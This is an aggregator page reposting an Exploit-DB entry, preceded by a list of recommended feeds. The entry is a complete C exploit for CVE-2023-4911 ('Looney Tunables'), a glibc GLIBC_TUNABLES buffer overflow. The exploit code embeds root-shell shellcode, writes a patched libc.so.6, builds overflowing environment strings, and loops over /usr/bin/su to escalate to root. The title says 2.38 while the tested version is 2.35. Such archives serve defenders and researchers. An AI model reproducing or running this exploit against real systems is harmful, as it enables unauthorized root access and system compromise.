惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

C
CXSECURITY Database RSS Feed - CXSecurity.com
Help Net Security
Help Net Security
P
Privacy International News Feed
S
Securelist
Threat Intelligence Blog | Flashpoint
Threat Intelligence Blog | Flashpoint
T
Tor Project blog
AWS News Blog
AWS News Blog
K
Kaspersky official blog
A
Arctic Wolf
Latest news
Latest news
T
Threat Research - Cisco Blogs
L
LINUX DO - 最新话题
P
Privacy & Cybersecurity Law Blog
Security Archives - TechRepublic
Security Archives - TechRepublic
Google DeepMind News
Google DeepMind News
K
KPMG report finds enterprise disconnect between AI and its ROI | CIO
月光博客
月光博客
N
News and Events Feed by Topic
Jina AI
Jina AI
博客园 - 司徒正美
WordPress大学
WordPress大学
罗磊的独立博客
雷峰网
雷峰网
AI
AI
Hugging Face - Blog
Hugging Face - Blog
D
Darknet – Hacking Tools, Hacker News & Cyber Security
S
Security @ Cisco Blogs
博客园 - 三生石上(FineUI控件)
H
Heimdal Security Blog
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
酷 壳 – CoolShell
酷 壳 – CoolShell
C
Cisco Blogs
博客园 - 【当耐特】
The Hacker News
The Hacker News
有赞技术团队
有赞技术团队
钛媒体:引领未来商业与生活新知
钛媒体:引领未来商业与生活新知
www.infosecurity-magazine.com
www.infosecurity-magazine.com
Schneier on Security
Schneier on Security
博客园 - Franky
S
SegmentFault 最新的问题
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Cloudbric
Cloudbric
爱范儿
爱范儿
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
S
Secure Thoughts
Last Week in AI
Last Week in AI
Application and Cybersecurity Blog
Application and Cybersecurity Blog
Know Your Adversary
Know Your Adversary
Google DeepMind News
Google DeepMind News

Exploit-DB.com RSS Feed

MEmu Android Emulator 9.2.7.0 - Local Privilege Escalation OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive OffSec’s Exploit Database Archive
OffSec’s Exploit Database Archive
Beatriz Fresno Naumova · 2026-02-11 · via Exploit-DB.com RSS Feed

glibc 2.38 - Buffer Overflow

Platform:

Linux

Date:

2026-02-11



# Exploit Title: glibc 2.38 - Buffer Overflow 
# Google Dork: N/A
# Date: 2025-10-08
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://www.gnu.org/software/libc/
# Software Link: https://ftp.gnu.org/gnu/libc/glibc-2.35.tar.gz
# Version: glibc 2.35 (specifically 2.35-0ubuntu3.3 on Ubuntu 22.04.3 LTS)
# Tested on: Ubuntu 22.04.3 LTS (glibc 2.35-0ubuntu3.3)
# CVE : CVE-2023-4911

# Description:
Looney Tunables - glibc GLIBC_TUNABLES Environment Variable Buffer Overflow 
# This is a local privilege escalation exploit for CVE-2023-4911, also known as
# "Looney Tunables", caused by a buffer overflow in the glibc dynamic loader's
# environment variable parsing logic. The vulnerability is triggered by crafting
# a maliciously long GLIBC_TUNABLES string which corrupts internal loader state,
# allowing control over DT_RPATH and arbitrary shared object loading.
#
# This PoC creates a patched version of libc.so.6 with embedded shellcode and
# abuses the loader to execute arbitrary code as root by invoking /usr/bin/su
# with a malicious environment.
#




#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <time.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <elf.h>

#define FILL_SIZE 0xd00
#define BOF_SIZE 0x600
#define MAX_ENVP  0x1000

// shellcode generado con pwntools
const unsigned char shellcode[] = {
    0x48, 0x31, 0xff,                         // xor    rdi,rdi
    0x6a, 0x69,                               // push   0x69 ; syscall setuid
    0x58,                                     // pop    rax
    0x0f, 0x05,                               // syscall
    0x48, 0x31, 0xff,                         // xor    rdi,rdi
    0x6a, 0x6a,                               // push   0x6a ; syscall setgid
    0x58,                                     // pop    rax
    0x0f, 0x05,                               // syscall
    0x48, 0x31, 0xd2,                         // xor    rdx, rdx
    0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 
    0x2f, 0x73, 0x68, 0x00,                   // mov rbx, "/bin/sh"
    0x53,                                     // push rbx
    0x48, 0x89, 0xe7,                         // mov rdi, rsp
    0x50,                                     // push rax
    0x57,                                     // push rdi
    0x48, 0x89, 0xe6,                         // mov rsi, rsp
    0xb0, 0x3b,                               // mov al, 0x3b
    0x0f, 0x05                                // syscall
};

int64_t time_us() {
    struct timespec tms;
    if (clock_gettime(CLOCK_REALTIME, &tms)) return -1;
    int64_t micros = tms.tv_sec * 1000000;
    micros += tms.tv_nsec / 1000;
    if (tms.tv_nsec % 1000 >= 500) ++micros;
    return micros;
}

void patch_libc() {
    FILE *f = fopen("/lib/x86_64-linux-gnu/libc.so.6", "rb");
    if (!f) { perror("fopen"); exit(1); }

    fseek(f, 0, SEEK_END);
    long size = ftell(f);
    rewind(f);

    unsigned char *data = malloc(size);
    if (fread(data, 1, size, f) != size) {
        perror("fread");
        exit(1);
    }
    fclose(f);

    Elf64_Ehdr *ehdr = (Elf64_Ehdr *)data;
    Elf64_Shdr *shdr = (Elf64_Shdr *)(data + ehdr->e_shoff);
    Elf64_Sym *symtab = NULL;
    char *strtab = NULL;

    for (int i = 0; i < ehdr->e_shnum; ++i) {
        if (shdr[i].sh_type == SHT_SYMTAB) {
            symtab = (Elf64_Sym *)(data + shdr[i].sh_offset);
            strtab = (char *)(data + shdr[shdr[i].sh_link].sh_offset);
            break;
        }
    }

    if (!symtab || !strtab) {
        fprintf(stderr, "[-] Failed to find symtab\n");
        exit(1);
    }

    Elf64_Addr target_addr = 0;
    for (int i = 0; i < shdr->sh_size / sizeof(Elf64_Sym); ++i) {
        if (strcmp(&strtab[symtab[i].st_name], "__libc_start_main") == 0) {
            target_addr = symtab[i].st_value;
            break;
        }
    }

    if (!target_addr) {
        fprintf(stderr, "[-] Could not find __libc_start_main\n");
        exit(1);
    }

    // patch shellcode at the symbol location
    memcpy(data + target_addr, shellcode, sizeof(shellcode));

    f = fopen("./libc.so.6", "wb");
    if (!f) { perror("fopen (write)"); exit(1); }
    fwrite(data, 1, size, f);
    fclose(f);

    free(data);
    printf("[+] Patched libc.so.6 written.\n");
}

int main(void) {
    char filler[FILL_SIZE], kv[BOF_SIZE], filler2[BOF_SIZE + 0x20], dt_rpath[0x20000];
    char *argv[] = {"/usr/bin/su", "--help", NULL};
    char *envp[MAX_ENVP] = { NULL };

    // Create directory and patched libc if not present
    if (mkdir("\"", 0755) == 0) {
        patch_libc();
        int sfd = open("./libc.so.6", O_RDONLY);
        int dfd = open("\"/libc.so.6", O_CREAT | O_WRONLY, 0755);
        char buf[0x1000];
        int len;
        while ((len = read(sfd, buf, sizeof(buf))) > 0) {
            write(dfd, buf, len);
        }
        close(sfd); close(dfd);
    }

    memset(filler, 'F', sizeof(filler)); filler[sizeof(filler)-1] = '\0';
    strcpy(filler, "GLIBC_TUNABLES=glibc.malloc.mxfast=");

    memset(kv, 'A', sizeof(kv)); kv[sizeof(kv)-1] = '\0';
    strcpy(kv, "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=");

    memset(filler2, 'F', sizeof(filler2)); filler2[sizeof(filler2)-1] = '\0';
    strcpy(filler2, "GLIBC_TUNABLES=glibc.malloc.mxfast=");

    for (int i = 0; i < MAX_ENVP; i++) envp[i] = "";
    envp[0] = filler;
    envp[1] = kv;
    envp[0x65] = "";
    envp[0x65 + 0xb8] = "\x30\xf0\xff\xff\xfd\x7f";
    envp[0xf7f] = filler2;

    for (int i = 0; i < sizeof(dt_rpath); i += 8) {
        *(uintptr_t *)(dt_rpath + i) = -0x14ULL;
    }
    dt_rpath[sizeof(dt_rpath) - 1] = '\0';
    for (int i = 0; i < 0x2f; i++) {
        envp[0xf80 + i] = dt_rpath;
    }
    envp[0xffe] = "AAAA";

    setrlimit(RLIMIT_STACK, &(struct rlimit){RLIM_INFINITY, RLIM_INFINITY});

    int pid;
    for (int ct = 1;; ct++) {
        if (ct % 100 == 0) printf("try %d\n", ct);

        if ((pid = fork()) < 0) {
            perror("fork"); break;
        } else if (pid == 0) {
            execve(argv[0], argv, envp);
            perror("execve (child)"); exit(1);
        } else {
            int wstatus;
            int64_t st = time_us(), en;
            wait(&wstatus);
            en = time_us();

            if (!WIFSIGNALED(wstatus) && en - st > 1000000) {
                printf("[+] Exploit likely succeeded!\n");
                break;
            }
        }
    }

    return 0;
}